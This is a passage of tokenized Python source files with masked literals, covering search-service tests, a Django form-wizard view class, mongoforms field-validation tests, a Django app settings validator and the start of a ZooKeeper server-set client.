SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' ) <EOL> context2 = context . constrain ( model = "<STR_LIT>" ) <EOL> counts = context2 . facet_counts <EOL> assert counts [ '<STR_LIT>' ] . keys ( ) == [ '<STR_LIT>' ] <EOL> assert counts [ '<STR_LIT>' ] . keys ( ) == [ '<STR_LIT>' ] <EOL> def test_distrib ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE , distrib = False ) <EOL> context = conn . new_context ( project = '<STR_LIT>' ) <EOL> count1 = context . hit_count <EOL> conn2 = SearchConnection ( TEST_SERVICE , distrib = True ) <EOL> context = conn2 . new_context ( project = '<STR_LIT>' ) <EOL> count2 = context . 
hit_count <EOL> assert count1 < count2 <EOL> def test_constrain ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' ) <EOL> count1 = context . hit_count <EOL> context = context . constrain ( model = "<STR_LIT>" ) <EOL> count2 = context . hit_count <EOL> assert count1 > count2 <EOL> def test_constrain_freetext ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' , query = '<STR_LIT>' ) <EOL> assert context . freetext_constraint == '<STR_LIT>' <EOL> context = context . constrain ( experiment = '<STR_LIT>' ) <EOL> assert context . freetext_constraint == '<STR_LIT>' <EOL> def test_constrain_regression1 ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' , model = '<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in context . facet_constraints <EOL> context2 = context . constrain ( experiment = '<STR_LIT>' ) <EOL> assert '<STR_LIT>' not in context . facet_constraints <EOL> def test_negative_facet ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( project = '<STR_LIT>' , model = '<STR_LIT>' ) <EOL> hits1 = context . hit_count <EOL> print context . facet_counts [ '<STR_LIT>' ] <EOL> context2 = context . constrain ( experiment = '<STR_LIT>' ) <EOL> hits2 = context2 . hit_count <EOL> context3 = context . constrain ( experiment = not_equals ( '<STR_LIT>' ) ) <EOL> hits3 = context3 . hit_count <EOL> assert hits1 == hits2 + hits3 <EOL> def test_replica ( ) : <EOL> conn = SearchConnection ( TEST_SERVICE ) <EOL> context = conn . new_context ( <EOL> query = '<STR_LIT>' ) <EOL> assert context . hit_count > <NUM_LIT:1> <EOL> context = conn . new_context ( <EOL> query = '<STR_LIT>' , <EOL> replica = False ) <EOL> assert context . hit_count == <NUM_LIT:1> </s>
<s> import re <EOL> from django import forms <EOL> from django . shortcuts import redirect <EOL> from django . core . urlresolvers import reverse <EOL> from django . forms import formsets , ValidationError <EOL> from django . views . generic import TemplateView <EOL> from django . utils . datastructures import SortedDict <EOL> from django . utils . decorators import classonlymethod <EOL> from formwizard . storage import get_storage <EOL> from formwizard . storage . exceptions import NoFileStorageConfigured <EOL> from formwizard . forms import ManagementForm <EOL> def normalize_name ( name ) : <EOL> new = re . sub ( '<STR_LIT>' , '<STR_LIT>' , name ) <EOL> return new . lower ( ) . strip ( '<STR_LIT:_>' ) <EOL> class StepsHelper ( object ) : <EOL> def __init__ ( self , wizard ) : <EOL> self . _wizard = wizard <EOL> def __dir__ ( self ) : <EOL> return self . all <EOL> def __len__ ( self ) : <EOL> return self . count <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . _wizard , self . all ) <EOL> @ property <EOL> def all ( self ) : <EOL> "<STR_LIT>" <EOL> return self . _wizard . get_form_list ( ) . keys ( ) <EOL> @ property <EOL> def count ( self ) : <EOL> "<STR_LIT>" <EOL> return len ( self . all ) <EOL> @ property <EOL> def current ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _wizard . storage . current_step or self . first <EOL> @ property <EOL> def first ( self ) : <EOL> "<STR_LIT>" <EOL> return self . all [ <NUM_LIT:0> ] <EOL> @ property <EOL> def last ( self ) : <EOL> "<STR_LIT>" <EOL> return self . all [ - <NUM_LIT:1> ] <EOL> @ property <EOL> def next ( self ) : <EOL> "<STR_LIT>" <EOL> return self . _wizard . get_next_step ( ) <EOL> @ property <EOL> def prev ( self ) : <EOL> "<STR_LIT>" <EOL> return self . _wizard . get_prev_step ( ) <EOL> @ property <EOL> def index ( self ) : <EOL> "<STR_LIT>" <EOL> return self . _wizard . get_step_index ( ) <EOL> @ property <EOL> def step0 ( self ) : <EOL> return int ( self . 
index)

# NOTE(review): every '<STR_LIT>' / <NUM_LIT:...> token below is a masked literal
# from a dataset dump. Comments describe structure only; literal values
# (dict keys, messages, template names) cannot be verified from this view.

@property
def step1(self):
    # 1-based position of the current step (self.index appears 0-based).
    return int(self.index) + <NUM_LIT:1>


class WizardView(TemplateView):
    """Base view driving a multi-step form wizard.

    Subclasses supply ``form_list`` (and usually ``storage_name``); each
    step's submitted data/files are held in a storage backend until every
    form validates, then ``done()`` is called with the final form list.
    Python 2 era code (``unicode``, ``iteritems``, ``SortedDict``).
    """
    storage_name = None
    form_list = None
    initial_dict = None
    instance_dict = None
    condition_dict = None
    template_name = '<STR_LIT>'

    def __repr__(self):
        return '<STR_LIT>' % (self.__class__.__name__, self.form_list)

    @classonlymethod
    def as_view(cls, *args, **kwargs):
        """Normalize wizard arguments via get_initkwargs() before deferring
        to the standard class-based-view as_view()."""
        initkwargs = cls.get_initkwargs(*args, **kwargs)
        return super(WizardView, cls).as_view(**initkwargs)

    @classmethod
    def get_initkwargs(cls, form_list, initial_dict=None,
                       instance_dict=None, condition_dict=None, *args, **kwargs):
        """Build the kwargs dict handed to the view constructor.

        Converts ``form_list`` (forms, or (name, form) pairs) into a
        SortedDict keyed by step name, and raises NoFileStorageConfigured
        if any form has a FileField but the class lacks a file-storage
        attribute (attribute name is masked).
        """
        kwargs.update({
            '<STR_LIT>': initial_dict or {},
            '<STR_LIT>': instance_dict or {},
            '<STR_LIT>': condition_dict or {},
        })
        init_form_list = SortedDict()
        assert len(form_list) > <NUM_LIT:0>, '<STR_LIT>'
        for i, form in enumerate(form_list):
            if isinstance(form, (list, tuple)):
                # (step_name, form_class) pair supplied by the caller.
                init_form_list[unicode(form[<NUM_LIT:0>])] = form[<NUM_LIT:1>]
            else:
                # Bare form class: the step name is its zero-based index.
                init_form_list[unicode(i)] = form
        for form in init_form_list.itervalues():
            if issubclass(form, formsets.BaseFormSet):
                # Inspect the formset's member form, not the formset itself.
                form = form.form
            for field in form.base_fields.itervalues():
                if (isinstance(field, forms.FileField) and
                        not hasattr(cls, '<STR_LIT>')):
                    raise NoFileStorageConfigured
        kwargs['<STR_LIT>'] = init_form_list
        return kwargs

    def get_wizard_name(self):
        # Derived from the class name; used as the storage/form prefix.
        return normalize_name(self.__class__.__name__)

    def get_prefix(self):
        return self.wizard_name

    def get_form_list(self):
        """Return the SortedDict of active steps: each entry of
        ``form_list`` whose condition (from ``condition_dict``, default
        True; callables receive the wizard instance) is truthy."""
        form_list = SortedDict()
        for form_key, form_class in self.form_list.iteritems():
            condition = self.condition_dict.get(form_key, True)
            if callable(condition):
                condition = condition(self)
            if condition:
                form_list[form_key] = form_class
        return form_list

    def dispatch(self, request, *args, **kwargs):
        """Set up per-request wizard state (name, prefix, storage backend,
        StepsHelper) before dispatching, and let the storage backend
        post-process the response (e.g. to set cookies)."""
        self.wizard_name = self.get_wizard_name()
        self.prefix = self.get_prefix()
        self.storage = get_storage(self.storage_name, self.prefix, request,
                                   getattr(self, '<STR_LIT>', None))
        self.steps = StepsHelper(self)
        response = super(WizardView, self).dispatch(request, *args, **kwargs)
        self.storage.update_response(response)
        return response

    def get(self, request, *args, **kwargs):
        """GET resets the wizard to its first step and renders it."""
        self.storage.reset()
        self.storage.current_step = self.steps.first
        return self.render(self.get_form())

    def post(self, *args, **kwargs):
        """Handle a step submission.

        A masked POST key acts as a "go to previous step" signal; otherwise
        the ManagementForm is validated, the submitted form is bound, and on
        success the wizard advances (or finishes via render_done()).
        """
        # Backwards navigation: re-render the requested earlier step from storage.
        wizard_prev_step = self.request.POST.get('<STR_LIT>', None)
        if wizard_prev_step and wizard_prev_step in self.get_form_list():
            self.storage.current_step = wizard_prev_step
            form = self.get_form(
                data=self.storage.get_step_data(self.steps.current),
                files=self.storage.get_step_files(self.steps.current))
            return self.render(form)
        management_form = ManagementForm(self.request.POST, prefix=self.prefix)
        if not management_form.is_valid():
            raise ValidationError('<STR_LIT>')
        form_current_step = management_form.cleaned_data['<STR_LIT>']
        if (form_current_step != self.steps.current and
                self.storage.current_step is not None):
            # Client claims a different step than storage: trust the form.
            self.storage.current_step = form_current_step
        form = self.get_form(data=self.request.POST, files=self.request.FILES)
        if form.is_valid():
            self.storage.set_step_data(self.steps.current, self.process_step(form))
            self.storage.set_step_files(self.steps.current, self.process_step_files(form))
            if self.steps.current == self.steps.last:
                return self.render_done(form, **kwargs)
            else:
                return self.render_next_step(form)
        return self.render(form)

    def render_next_step(self, form, **kwargs):
        """Advance storage to the next step and render its form (rebound
        from any previously stored data for that step)."""
        next_step = self.steps.next
        new_form = self.get_form(next_step,
                                 data=self.storage.get_step_data(next_step),
                                 files=self.storage.get_step_files(next_step))
        self.storage.current_step = next_step
        return self.render(new_form, **kwargs)

    def render_done(self, form, **kwargs):
        """Re-validate every step from storage; on any failure fall back to
        render_revalidation_failure(), otherwise call done() and reset
        storage."""
        final_form_list = []
        for form_key in self.get_form_list():
            form_obj = self.get_form(step=form_key,
                                     data=self.storage.get_step_data(form_key),
                                     files=self.storage.get_step_files(form_key))
            if not form_obj.is_valid():
                return self.render_revalidation_failure(form_key, form_obj, **kwargs)
            final_form_list.append(form_obj)
        done_response = self.done(final_form_list, **kwargs)
        self.storage.reset()
        return done_response

    def get_form_prefix(self, step=None, form=None):
        """Prefix used for the step's form fields; defaults to the step name."""
        if step is None:
            step = self.steps.current
        return str(step)

    def get_form_initial(self, step):
        """Initial data for ``step`` from ``initial_dict`` (empty dict default)."""
        return self.initial_dict.get(step, {})

    def get_form_instance(self, step):
        """Model instance for ``step`` from ``instance_dict`` (None default)."""
        return self.instance_dict.get(step, None)

    def get_form_kwargs(self, step=None):
        """Hook for extra per-step form constructor kwargs; default none."""
        return {}

    def get_form(self, step=None, data=None, files=None):
        """Instantiate the form for ``step`` (current step by default),
        wiring in data/files/prefix/initial and, for ModelForm /
        BaseModelFormSet subclasses, the configured instance/queryset
        (key names masked)."""
        if step is None:
            step = self.steps.current
        kwargs = self.get_form_kwargs(step)
        kwargs.update({
            '<STR_LIT:data>': data,
            '<STR_LIT>': files,
            '<STR_LIT>': self.get_form_prefix(step, self.form_list[step]),
            '<STR_LIT>': self.get_form_initial(step),
        })
        if issubclass(self.form_list[step], forms.ModelForm):
            kwargs.update({'<STR_LIT>': self.get_form_instance(step)})
        elif issubclass(self.form_list[step], forms.models.BaseModelFormSet):
            kwargs.update({'<STR_LIT>': self.get_form_instance(step)})
        return self.form_list[step](**kwargs)

    def process_step(self, form):
        """Hook: transform a validated form into storable step data."""
        return self.get_form_step_data(form)

    def process_step_files(self, form):
        """Hook: transform a validated form into storable step files."""
        return self.get_form_step_files(form)

    def render_revalidation_failure(self, step, form, **kwargs):
        """Jump back to the step that failed re-validation and render it."""
        self.storage.current_step = step
        return self.render(form, **kwargs)

    def get_form_step_data(self, form):
        """Hook: raw data persisted for a step (default: form.data)."""
        return form.data

    def get_form_step_files(self, form):
        """Hook: files persisted for a step (default: form.files)."""
        return form.files

    def get_all_cleaned_data(self):
        """Merge cleaned_data of every valid step into one dict; list/tuple
        cleaned_data (formsets) is stored under a per-step key (masked
        format string) instead of being merged."""
        cleaned_data = {}
        for form_key in self.get_form_list():
            form_obj = self.get_form(
                step=form_key,
                data=self.storage.get_step_data(form_key),
                files=self.storage.get_step_files(form_key)
            )
            if form_obj.is_valid():
                if isinstance(form_obj.cleaned_data, (tuple, list)):
                    cleaned_data.update({
                        '<STR_LIT>' % form_key: form_obj.cleaned_data
                    })
                else:
                    cleaned_data.update(form_obj.cleaned_data)
        return cleaned_data

    def get_cleaned_data_for_step(self, step):
        """cleaned_data for one step rebuilt from storage, or None if the
        step is unknown or does not validate."""
        if step in self.form_list:
            form_obj = self.get_form(step=step,
                                     data=self.storage.get_step_data(step),
                                     files=self.storage.get_step_files(step))
            if form_obj.is_valid():
                return form_obj.cleaned_data
        return None

    def get_next_step(self, step=None):
        """Name of the step after ``step`` in the active form list, or None."""
        if step is None:
            step = self.steps.current
        form_list = self.get_form_list()
        key = form_list.keyOrder.index(step) + <NUM_LIT:1>
        if len(form_list.keyOrder) > key:
            return form_list.keyOrder[key]
        return None

    def get_prev_step(self, step=None):
        """Name of the step before ``step`` in the active form list, or None."""
        if step is None:
            step = self.steps.current
        form_list = self.get_form_list()
        key = form_list.keyOrder.index(step) - <NUM_LIT:1>
        if key >= <NUM_LIT:0>:
            return form_list.keyOrder[key]
        return None

    def get_step_index(self, step=None):
        """Zero-based index of ``step`` within the active form list."""
        if step is None:
            step = self.steps.current
        return self.get_form_list().keyOrder.index(step)

    def get_context_data(self, form, *args, **kwargs):
        """Template context: storage extra_data plus a wizard sub-dict with
        the form, the StepsHelper and a pre-filled ManagementForm."""
        context = super(WizardView, self).get_context_data(*args, **kwargs)
        context.update(self.storage.extra_data)
        context['<STR_LIT>'] = {
            '<STR_LIT>': form,
            '<STR_LIT>': self.steps,
            '<STR_LIT>': ManagementForm(prefix=self.prefix, initial={
                '<STR_LIT>': self.steps.current,
            }),
        }
        return context

    def render(self, form=None, **kwargs):
        """Render the given form (current step's form by default)."""
        form = form or self.get_form()
        context = self.get_context_data(form, **kwargs)
        return self.render_to_response(context)

    def done(self, form_list, **kwargs):
        """Must be overridden: receives every validated form when the wizard
        completes."""
        raise NotImplementedError("<STR_LIT>"
                                  "<STR_LIT>" % self.__class__.__name__)


class SessionWizardView(WizardView):
    """WizardView bound to the session storage backend (name masked)."""
    storage_name = '<STR_LIT>'


class CookieWizardView(WizardView):
    """WizardView bound to the cookie storage backend (name masked)."""
    storage_name = '<STR_LIT>'


class NamedUrlWizardView(WizardView):
    """Wizard whose steps are addressed by named URLs: navigation happens
    via redirects to ``url_name`` with a per-step URL kwarg instead of
    re-rendering in place."""
    url_name = None
    done_step_name = None

    @classmethod
    def get_initkwargs(cls, *args, **kwargs):
        """Extract url_name/done_step_name (keys masked) before delegating,
        and assert the done-step name does not collide with a form step."""
        assert '<STR_LIT>' in kwargs, '<STR_LIT>'
        extra_kwargs = {
            '<STR_LIT>': kwargs.pop('<STR_LIT>', '<STR_LIT>'),
            '<STR_LIT>': kwargs.pop('<STR_LIT>'),
        }
        initkwargs = super(NamedUrlWizardView, cls).get_initkwargs(*args, **kwargs)
        initkwargs.update(extra_kwargs)
        assert initkwargs['<STR_LIT>'] not in initkwargs['<STR_LIT>'], '<STR_LIT>' % initkwargs['<STR_LIT>']
        return initkwargs

    def get(self, *args, **kwargs):
        """Route a GET by its step URL kwarg: no step -> redirect to the
        current step (optionally resetting first, preserving the query
        string); done step -> re-validate and finish; current/known step ->
        render it; unknown step -> redirect to the first step."""
        step_url = kwargs.get('<STR_LIT>', None)
        if step_url is None:
            if '<STR_LIT>' in self.request.GET:
                # Masked GET flag restarts the wizard.
                self.storage.reset()
                self.storage.current_step = self.steps.first
            if self.request.GET:
                query_string = "<STR_LIT>" % self.request.GET.urlencode()
            else:
                query_string = "<STR_LIT>"
            next_step_url = reverse(self.url_name, kwargs={
                '<STR_LIT>': self.steps.current,
            }) + query_string
            return redirect(next_step_url)
        elif step_url == self.done_step_name:
            last_step = self.steps.last
            return self.render_done(self.get_form(step=last_step,
                data=self.storage.get_step_data(last_step),
                files=self.storage.get_step_files(last_step)
            ), **kwargs)
        elif step_url == self.steps.current:
            # NOTE(review): files= is fed current_step_data (not step files)
            # here and below — looks suspicious, but preserved as written.
            return self.render(self.get_form(
                data=self.storage.current_step_data,
                files=self.storage.current_step_data,
            ), **kwargs)
        elif step_url in self.get_form_list():
            self.storage.current_step = step_url
            return self.render(self.get_form(
                data=self.storage.current_step_data,
                files=self.storage.current_step_data,
            ), **kwargs)
        else:
            self.storage.current_step = self.steps.first
            return redirect(self.url_name, step=self.steps.first)

    def post(self, *args, **kwargs):
        """Backwards navigation redirects to the previous step's URL;
        everything else is handled by WizardView.post()."""
        prev_step = self.request.POST.get('<STR_LIT>', None)
        if prev_step and prev_step in self.get_form_list():
            self.storage.current_step = prev_step
            return redirect(self.url_name, step=prev_step)
        return super(NamedUrlWizardView, self).post(*args, **kwargs)

    def render_next_step(self, form, **kwargs):
        """Advance by redirecting to the next step's URL."""
        next_step = self.get_next_step()
        self.storage.current_step = next_step
        return redirect(self.url_name, step=next_step)

    def render_revalidation_failure(self, failed_step, form, **kwargs):
        """Redirect back to the URL of the step that failed re-validation."""
        self.storage.current_step = failed_step
        return redirect(self.url_name, step=failed_step)

    def render_done(self, form, **kwargs):
        """Force completion to happen on the done-step URL before running
        the normal render_done() re-validation."""
        if kwargs.get('<STR_LIT>', None) != self.done_step_name:
            return redirect(self.url_name, step=self.done_step_name)
        return super(NamedUrlWizardView, self).render_done(form, **kwargs)


class NamedUrlSessionWizardView(NamedUrlWizardView):
    """Named-URL wizard using the session storage backend (name masked)."""
    storage_name = '<STR_LIT>'


class NamedUrlCookieWizardView(NamedUrlWizardView):
    """Named-URL wizard using the cookie storage backend (name masked)."""
    storage_name = '<STR_LIT>'
</s>
<s> from decimal import Decimal
from mongoengine import Document, EmbeddedDocument
from mongoengine.fields import *
from mongoforms.fields import MongoFormFieldGenerator
from testprj.tests import MongoengineTestCase

# NOTE(review): '<STR_LIT...>' tokens are masked literals from a dataset dump;
# the sample values these tests feed to validate() cannot be recovered here.


class _FieldValidateTestCase(MongoengineTestCase):
    """Shared harness: for one mongoengine field type, check that the form
    field produced by MongoFormFieldGenerator validates the samples in
    ``correct_samples`` and rejects those in ``incorrect_samples``.

    Subclasses set ``field_class`` (or override get_field()) and the sample
    lists; ``is_not_implemented`` skips the whole check.
    """
    field_class = None
    # Pairs of (dirty_value, expected_clean_value) accepted by validate().
    correct_samples = ()
    # Values for which validate() must raise ValidationError.
    incorrect_samples = ()
    # True for generator mappings not implemented yet: runTest is a no-op.
    is_not_implemented = False

    def setUp(self):
        self.generator = MongoFormFieldGenerator()

    def get_field(self):
        # Declare a throwaway Document so the field is fully initialized by
        # mongoengine's metaclass before being handed to the generator.
        class TestDocument(Document):
            test_field = self.field_class()
        return TestDocument._fields['<STR_LIT>']

    def get_form_field(self):
        return self.generator.generate('<STR_LIT>', self.get_field())

    def runTest(self):
        if self.is_not_implemented:
            return
        for dirty_value, clean_value in self.correct_samples:
            self.assertEqual(
                clean_value,
                self.get_form_field().validate(dirty_value))
        for value in self.incorrect_samples:
            self.assertRaises(
                ValidationError,
                lambda: self.get_form_field().validate(value))


class Test001StringFieldValidate(_FieldValidateTestCase):
    field_class = StringField
    correct_samples = [('<STR_LIT>', None)]


class Test002IntFieldValidate(_FieldValidateTestCase):
    field_class = IntField
    correct_samples = [('<STR_LIT>', None)]


class Test003FloatFieldValidate(_FieldValidateTestCase):
    field_class = FloatField
    correct_samples = [('<STR_LIT>', None)]


class Test004BooleanFieldValidate(_FieldValidateTestCase):
    field_class = BooleanField
    correct_samples = [('<STR_LIT:1>', None), ('<STR_LIT:0>', None)]


class Test005DateTimeFieldValidate(_FieldValidateTestCase):
    field_class = DateTimeField
    correct_samples = [('<STR_LIT>', None)]


class Test006EmbeddedDocumentFieldValidate(_FieldValidateTestCase):
    is_not_implemented = True

    def get_field(self):
        # EmbeddedDocumentField needs a concrete embedded document class.
        class TestEmbeddedDocument(EmbeddedDocument):
            pass

        class TestDocument(Document):
            test_field = EmbeddedDocumentField(TestEmbeddedDocument)
        return TestDocument._fields['<STR_LIT>']


class Test007ListFieldValidate(_FieldValidateTestCase):
    field_class = ListField
    is_not_implemented = True


class Test008DictFieldValidate(_FieldValidateTestCase):
    field_class = DictField
    is_not_implemented = True


class Test009ObjectIdFieldValidate(_FieldValidateTestCase):
    field_class = ObjectIdField
    is_not_implemented = True


class Test010ReferenceFieldValidate(_FieldValidateTestCase):
    correct_samples = []

    def get_field(self):
        # ReferenceField takes the referenced document (name masked).
        class TestDocument(Document):
            test_field = ReferenceField('<STR_LIT>')
        return TestDocument._fields['<STR_LIT>']


class Test011MapFieldValidate(_FieldValidateTestCase):
    is_not_implemented = True

    def get_field(self):
        class TestDocument(Document):
            test_field = MapField(StringField())
        return TestDocument._fields['<STR_LIT>']


class Test012DecimalFieldValidate(_FieldValidateTestCase):
    field_class = DecimalField
    correct_samples = [(Decimal('<STR_LIT>'), Decimal('<STR_LIT>'))]


class Test013ComplexDateTimeFieldValidate(_FieldValidateTestCase):
    field_class = ComplexDateTimeField
    is_not_implemented = True


class Test014URLFieldValidate(_FieldValidateTestCase):
    field_class = URLField
    correct_samples = [('<STR_LIT>', None)]


class Test015GenericReferenceFieldValidate(_FieldValidateTestCase):
    field_class = GenericReferenceField
    is_not_implemented = True


class Test016FileFieldValidate(_FieldValidateTestCase):
    field_class = FileField
    is_not_implemented = True


class Test017BinaryFieldValidate(_FieldValidateTestCase):
    field_class = BinaryField
    is_not_implemented = True


class Test018SortedListFieldValidate(_FieldValidateTestCase):
    is_not_implemented = True

    def get_field(self):
        class TestDocument(Document):
            test_field = SortedListField(StringField)
        return TestDocument._fields['<STR_LIT>']


class Test019EmailFieldValidate(_FieldValidateTestCase):
    field_class = EmailField
    correct_samples = [('<STR_LIT>', None)]


class Test020GeoPointFieldValidate(_FieldValidateTestCase):
    field_class = GeoPointField
    is_not_implemented = True


class Test021ImageFieldValidate(_FieldValidateTestCase):
    field_class = ImageField
    is_not_implemented = True


class Test022SequenceFieldValidate(_FieldValidateTestCase):
    field_class = SequenceField
    is_not_implemented = True


class Test023UUIDFieldValidate(_FieldValidateTestCase):
    field_class = UUIDField
    is_not_implemented = True


class Test024GenericEmbeddedDocumentFieldValidate(_FieldValidateTestCase):
    field_class = GenericEmbeddedDocumentField
    is_not_implemented = True </s>
<s> import sys
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured

# NOTE(review): '<STR_LIT>' / <NUM_LIT:...> tokens are masked literals from a
# dataset dump; the exact setting prefixes, app labels and error messages
# cannot be recovered from this view.


class Settings(object):
    """App-settings proxy: attribute access falls back from a (prefixed,
    masked) name in django.conf.settings to the defaults given at
    construction time."""

    def __init__(self, **kwargs):
        self.defaults = kwargs

    def __getattr__(self, key):
        # Look up the project-level override first; KeyError here means the
        # attribute is not a known app setting.
        return getattr(settings, '<STR_LIT>' % key, self.defaults[key])


# Default values for every setting this app understands.
up_settings = Settings(
    REGISTRATION_FORM='<STR_LIT>',
    DOUBLE_CHECK_EMAIL=False,
    CHECK_UNIQUE_EMAIL=False,
    DOUBLE_CHECK_PASSWORD=False,
    REGISTRATION_FULLNAME=False,
    REGISTRATION_REDIRECT='<STR_LIT>',
    EMAIL_ONLY=False,
    AUTO_LOGIN=False,
    USE_ACCOUNT_VERIFICATION=False,
    ACCOUNT_VERIFICATION_DAYS=<NUM_LIT:7>,
    USE_EMAIL_VERIFICATION=False,
    EMAIL_VERIFICATION_DAYS=<NUM_LIT:2>,
    EMAIL_VERIFICATION_DONE_URL='<STR_LIT>',
    USE_PROFILE=False,
    PROFILE_FORM='<STR_LIT>',
    PROFILE_ALLOW_EMAIL_CHANGE=False,
    PROFILE_CHANGE_DONE_URL='<STR_LIT>',
    INLINE_PROFILE_ADMIN=False,
)


def validate_settings():
    """Raise ImproperlyConfigured for mutually inconsistent combinations of
    the settings above (missing INSTALLED_APPS entries, incompatible flag
    pairs). Runs once at import time."""
    # Account verification needs its supporting app installed.
    if (up_settings.USE_ACCOUNT_VERIFICATION and
            '<STR_LIT>' not in settings.INSTALLED_APPS):
        raise ImproperlyConfigured('<STR_LIT>'
                                   '<STR_LIT>')
    # Verification and auto-login are mutually exclusive.
    if up_settings.USE_ACCOUNT_VERIFICATION and up_settings.AUTO_LOGIN:
        raise ImproperlyConfigured("<STR_LIT>")
    # Profile support needs its supporting app installed.
    if up_settings.USE_PROFILE and '<STR_LIT>' not in settings.INSTALLED_APPS:
        raise ImproperlyConfigured('<STR_LIT>'
                                   '<STR_LIT>')
    # Email change cannot coexist with the unique-email constraint.
    if up_settings.PROFILE_ALLOW_EMAIL_CHANGE and up_settings.CHECK_UNIQUE_EMAIL:
        raise ImproperlyConfigured(
            '<STR_LIT>'
            '<STR_LIT>')
    # Email verification needs its supporting app installed.
    if (up_settings.USE_EMAIL_VERIFICATION and
            '<STR_LIT>' not in settings.INSTALLED_APPS):
        raise ImproperlyConfigured('<STR_LIT>'
                                   '<STR_LIT>')
    # Email change requires email verification to be enabled.
    if up_settings.PROFILE_ALLOW_EMAIL_CHANGE and up_settings.USE_EMAIL_VERIFICATION:
        raise ImproperlyConfigured(
            '<STR_LIT>'
            '<STR_LIT>')
    # Outside the test runner, the masked app must not be installed when
    # email verification is disabled.
    if ('<STR_LIT:test>' not in sys.argv and not up_settings.USE_EMAIL_VERIFICATION and
            '<STR_LIT>' in settings.INSTALLED_APPS):
        raise ImproperlyConfigured('<STR_LIT>'
                                   '<STR_LIT>')


validate_settings() </s>
<s> import json
import logging
import posixpath
import gevent
from gevent.event import Event
from gevent.queue import Queue
from kazoo.client import KazooClient
from kazoo.exceptions import NoNodeError
from kazoo.recipe.watchers import (ChildrenWatch, DataWatch)

# NOTE(review): '<STR_LIT...>' / <NUM_LIT:...> tokens are masked literals from
# a dataset dump; log messages and JSON key names cannot be recovered here.

ROOT_LOG = logging.getLogger('<STR_LIT>')


class Endpoint(object):
    """Immutable (host, port) pair with value equality and hashing."""

    def __init__(self, host, port):
        self._host = host
        self._port = port

    def _key(self):
        return self.host, self.port

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self._key() == other._key()

    def __hash__(self):
        return hash(self._host) ^ hash(self._port)

    @property
    def host(self):
        return self._host

    @property
    def port(self):
        return self._port

    def __str__(self):
        return '<STR_LIT>' % (self.host, self.port)


class Member(object):
    """One server-set member: a service endpoint plus named additional
    endpoints, a status string and an optional integer shard id."""

    @classmethod
    def from_node(cls, member, data):
        """Parse a member from its ZooKeeper node name and JSON payload.

        Raises ValueError when any of the three required keys (masked:
        additional endpoints, service endpoint, status) is missing; a
        non-integer shard is logged and dropped rather than raising.
        """
        blob = json.loads(data)
        additional_endpoints = blob.get('<STR_LIT>')
        if additional_endpoints is None:
            raise ValueError("<STR_LIT>")
        service_endpoint = blob.get('<STR_LIT>')
        if service_endpoint is None:
            raise ValueError("<STR_LIT>")
        status = blob.get('<STR_LIT:status>')
        if status is None:
            raise ValueError("<STR_LIT>")
        shard = blob.get('<STR_LIT>')
        if shard is not None:
            try:
                shard = int(shard)
            except ValueError:
                ROOT_LOG.warn('<STR_LIT>' % shard)
                shard = None
        return cls(
            member=member,
            service_endpoint=Endpoint(service_endpoint['<STR_LIT:host>'], service_endpoint['<STR_LIT:port>']),
            additional_endpoints=dict((name, Endpoint(value['<STR_LIT:host>'], value['<STR_LIT:port>']))
                                      for name, value in additional_endpoints.items()),
            shard=shard,
            status=status
        )

    def __init__(
            self,
            member,
            service_endpoint,
            additional_endpoints,
            shard,
            status):
        self._name = member
        self._service_endpoint = service_endpoint
        self._additional_endpoints = additional_endpoints
        self._status = status
        self._shard = shard

    @property
    def name(self):
        return self._name

    @property
    def service_endpoint(self):
        return self._service_endpoint

    @property
    def additional_endpoints(self):
        return self._additional_endpoints

    @property
    def status(self):
        return self._status

    @property
    def shard(self):
        return self._shard

    def __addl_endpoints_str(self):
        # Formatted "name -> endpoint" strings for repr/equality purposes.
        return ['<STR_LIT>' % (k, v) for k, v in self.additional_endpoints.items()]

    def __str__(self):
        return '<STR_LIT>' % (
            self.service_endpoint,
            ('<STR_LIT>' % self._shard) if self._shard is not None else '<STR_LIT>',
            '<STR_LIT>'.join(self.__addl_endpoints_str()),
            self.status
        )

    def _key(self):
        # Note: the node name is deliberately NOT part of the value key.
        return (
            self.service_endpoint,
            frozenset(sorted(self.__addl_endpoints_str())),
            self.status,
            self._shard)

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self._key() == other._key()

    def __hash__(self):
        return hash(self._key())


class ServerSet(object):
    """Live view of a ZooKeeper-backed server set.

    Iterating yields current members; optional on_join/on_leave callbacks
    are dispatched from a gevent worker greenlet fed by kazoo watches.
    """

    class _CallbackBlocker(object):
        """Re-entrant gate: while any greenlet is inside the context
        manager, the notification worker waits (ensure_safe) so callbacks
        do not race ad-hoc reads of the set."""

        def __init__(self):
            self.event = Event()
            self.event.set()  # initially open
            self._count = <NUM_LIT:0>

        def __enter__(self):
            if self._count == <NUM_LIT:0>:
                self.event.clear()
            self._count += <NUM_LIT:1>

        def __exit__(self, exc_type, exc_val, exc_tb):
            self._count -= <NUM_LIT:1>
            if self._count == <NUM_LIT:0>:
                self.event.set()

        def ensure_safe(self):
            # Block until no reader holds the gate.
            self.event.wait()

        def is_blocking(self):
            return self._count != <NUM_LIT:0>

    def __init__(self, zk, zk_path, on_join=None, on_leave=None,
                 member_filter=None, member_factory=None):
        """Requires an already-connected KazooClient. member_filter screens
        node names; member_factory builds Member objects from (node, data)
        and defaults to Member.from_node. Watches are only installed when a
        join/leave callback is given."""
        def noop(*args, **kwargs): pass
        def true(*args, **kwargs): return True
        self._log = ROOT_LOG.getChild('<STR_LIT>' % zk_path)
        self._log.info('<STR_LIT>' % zk_path)
        if not isinstance(zk, KazooClient):
            raise TypeError('<STR_LIT>')
        if not zk.connected:
            raise Exception('<STR_LIT>')
        self._zk_path = zk_path
        self._zk = zk
        self._nodes = set()
        self._members = {}
        self._on_join = on_join or noop
        self._on_leave = on_leave or noop
